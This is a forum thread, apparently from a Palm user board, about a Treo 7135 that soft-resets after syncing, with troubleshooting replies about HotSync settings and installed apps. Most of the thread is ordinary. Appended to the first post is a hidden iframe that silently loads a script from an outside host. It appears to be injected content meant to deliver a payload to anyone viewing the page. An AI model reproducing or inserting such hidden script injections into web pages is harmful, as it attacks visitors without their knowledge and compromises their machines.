+ Reply to Thread

Automatic reboot after sync

I've got a 7135 on Verizon (bought through getconnected.com
    and easily set up with a phone call to Verizon, BTW). This is
    my first experience with a Palm device, so I don't know if I'm
    just seeing a feature:

The Palm portion of the phone always reboots after it syncs
    with my PC. Is anyone else seeing this?

:anger<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Automatic reboot after sync

Originally posted by InkMot
    The Palm portion of the phone always reboots after it syncs
    with my PC. Is anyone else seeing this?

:anger
    If you are talking about the Palm going through a soft reset, that should not be happening after a sync. All of my Palm devices, including the 7135, just remain on the HotSync screen after a sync. Have you installed any additional applications to your 7135?

Ah-hem...a few things wer intalled:

Movian VPN
    Visto (mail sync program)
    Palm Mail

I think that's it.

And yes, I am talking about a soft reset.

Thanks for the reply.

I don't use those programs (though I have quite a number of others loaded) so I can't be of any help. Either one of those apps is causing the problem or you have a hardware issue. I would begin by uninstalling the programs you added and trying a clean hotsync to see if the soft reset still happens. If not, reload them one by one and see where the problem returns.

Maybe others on this board have had more specific experience with your problem and can offer some more advice. Good luck!

Re: Re: Automatic reboot after sync

Originally posted by lnoble
    If you are talking about the Palm going through a soft reset, that should not be happening after a sync. All of my Palm devices, including the 7135, just remain on the HotSync screen after a sync. Have you installed any additional applications to your 7135?

The only time I've SEEN it happening that way is if you have CHANGED the SYSTEM setting (Hotsynch manager) to be anything OTHER than Handheld Overwites Desktop
    **** Metcalf, aka Rotcod Zzaj
    Perpetrator & Instigator
    Zzaj Productions

System refers to the Operating system instructions.

Setting it to desktop overwrites handheld will direct the hotsync to reload the back up of the OS settign to the phone. This always resets the device.

Set it to handheld overwrites desktop and you should be fine. Make sure to set it as default as well.

You are correct Rotcod
    I wasn't here
    You don't know me

Administrator
    i would keep it to "synchronize". that way both ends are covered...

there maybe an app caussing you to soft reboot.. by that you mean the palm splash screen coming on correct? sounds like something that gets loaded (like hackmaster or when you load up custom ringtones) to the phone that requires a soft reset .

If it keeps reseting, an installed app is hanging it. Apps that you install can have the reset after install attribute set. If it keeps installing it, this may be the problem. Check your install tool and install folder for remains....

I've tried changing the synchonization settings to "device overwrites PC" as suggested but still get the soft reset. However, I noticed this morning that the settings have
    magically reset themselves back to "synchronize". So, I'm
    trying again.

The next step is to uninstall what I've installed.

BTW, the 7135 gets slammed in the 2/10 issue of Business week.
    I had a collegue drop the article on my desk with a note that she
    was now ordering a Blackberry. The guy's big issue seems to be the fact that you can't use the touch screen in phone mode and (he thinks) the grafitti pad is hard to use due to the hinge. Hmm..

Who cares if you can use the touch screen in phone mode??? What benifit would it have? THat is why you have a keyboard.

These people are so f....ing stupid.

Originally posted by InkMot
    I've tried changing the synchonization settings to "device overwrites PC" as suggested but still get the soft reset. However, I noticed this morning that the settings have
    magically reset themselves back to "synchronize". So, I'm
    trying again.
    It will always go back to "synchronize" unless you check the "set as default" box when you make the change.

Yeah, I wasn't sure why he was complaining about that. If you're going to ***** about the 7135 go for the bulkiness and clumsyness of it. My goal was to integrate a PDA (which I need to carry ) with a phone (a necessity as well). It does that. Is it perfect? No. Could it be smaller? Yes. Could it integrate better with my desktop PC? Of course...we're working on that.